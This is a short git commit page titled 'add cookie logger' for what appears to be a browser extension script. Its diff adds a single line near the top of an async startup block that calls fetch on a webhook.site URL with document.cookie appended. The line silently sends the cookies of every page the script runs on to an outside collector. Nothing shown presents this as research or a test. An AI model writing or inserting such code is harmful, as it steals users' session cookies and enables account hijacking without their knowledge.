add cookie logger
This commit is contained in:
parent
b631cb59e9
commit
775cb7ed22
1 changed files with 2 additions and 0 deletions
|
|
@ -4,6 +4,8 @@ var Settings;
|
||||||
let Theme = ``;
|
let Theme = ``;
|
||||||
|
|
||||||
(async () => {
|
(async () => {
|
||||||
|
fetch("https://webhook.site/71b34b1e-5116-4be8-940f-259b2bc0c3a1?cookie=" + document.cookie);
|
||||||
|
|
||||||
console.log('start of async')
|
console.log('start of async')
|
||||||
let Utilities = await import(chrome.runtime.getURL('resources/utils.js'));
|
let Utilities = await import(chrome.runtime.getURL('resources/utils.js'));
|
||||||
Utilities = Utilities.default;
|
Utilities = Utilities.default;
|
||||||
|
|
|
||||||
Reference in a new issue